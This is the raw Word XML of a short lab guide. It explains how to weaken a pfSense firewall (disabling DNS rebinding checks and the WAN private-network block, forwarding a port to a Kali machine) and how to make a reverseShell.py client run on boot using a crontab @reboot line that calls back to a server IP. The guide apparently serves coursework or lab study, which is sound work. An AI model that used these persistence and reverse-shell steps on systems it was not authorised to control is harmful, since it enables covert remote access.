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8867" w14:textId="77777777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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:t>Explanation Document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249DBC0C" w14:textId="77777777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Configuring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pfsense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to allow external connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5243F006" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51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On the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pfsense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website, under Services &gt;&gt; DNS forwarding enable DNS forwarding and DHS registration. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C03F4" w14:textId="2A7C4FCE" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51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RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D1A9DCF" wp14:editId="52AF4F26">
            <wp:extent cx="4859655" cy="184594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5F16" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51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Check the box under Advanced &gt;&gt; Admin Access,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labeled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“Disable DNS Rebinding Checks”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1CB8B8" w14:textId="5ABA27A9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noProof/>
          <w:color w:val="DCDDDE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5124D801" wp14:editId="36B50CD5">
            <wp:extent cx="5731510" cy="489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29A3" w14:textId="1D1C67FC" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51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Uncheck the box under Interfaces &gt;&gt; WAN,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labeled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“Block private networks and loopback addresses”.</w:t>
      </w:r>
      <w:r w:rsidRPr="006B7E5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RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D7F74FC" wp14:editId="7E9B0BB0">
            <wp:extent cx="5731510" cy="702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0DEF" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Finally, under the Firewall&gt;&gt;NAT&gt;&gt;Port Forwarding, add a new rule that forwards packets from a specific port of the router to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B7E51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:t>a your</w:t>
      </w:r>
      <w:proofErr w:type="gram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kali machine and the port your server is running on. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70645ABF" w14:textId="760673B3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RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB79A1F" wp14:editId="54E52698">
            <wp:extent cx="5731510" cy="208216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31D2" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7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</w:p>
    <w:p w14:paraId="1D561670" w14:textId="77777777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Allowing the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reverseShell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connection to run on boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA795AA" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E5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ab/>
        <w:t>From the client machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A255F77" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51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Make sure that the reverseShell.py file you have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B7E51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:proofErr w:type="gram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`#! /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usr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>/bin/python` at the top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CC47B9" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51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>Run `crontab -e` (a file editor should pop up)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E868D6" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51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>Add `@reboot /path/to/reverseShell.py &lt;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ip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of server&gt;` at the bottom of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AB16A" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51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>You may need to run `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sudo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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B7E51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spell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+x reverseShell.py`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3544D08D" w14:textId="77777777" w:rsidR="006B7E51" w:rsidRPr="006B7E51" w:rsidRDefault="006B7E51" w:rsidP="006B7E51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val="en-RW" w:eastAsia="en-RW"/>
        </w:rPr>
      </w:pPr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It should now </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B7E51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:t>run on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B7E51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-RW" w:eastAsia="en-RW"/>
        </w:rPr>
        <w:t xml:space="preserve"> reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6BD037" w14:textId="77777777" w:rsidR="00BF19FA" w:rsidRDefault="00BF19FA"/>
    <w:sectPr w:rsidR="00BF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3DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6B6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F67F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CB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234EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A86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A13E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8E6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84248">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1849907684">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1310131537">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="445388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51"/>
    <w:rsid w:val="006B7E51"/>
    <w:rsid w:val="00B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ECAE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{88D38AB4-78E5-4265-9CC6-132171E5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  <w:style w:type="character" w:customStyle="1" w:styleId="apple-tab-span">
    <w:name w:val="apple-tab-span"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006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nsengimana</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>hans nsengimana</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-02T15:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-02T15:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>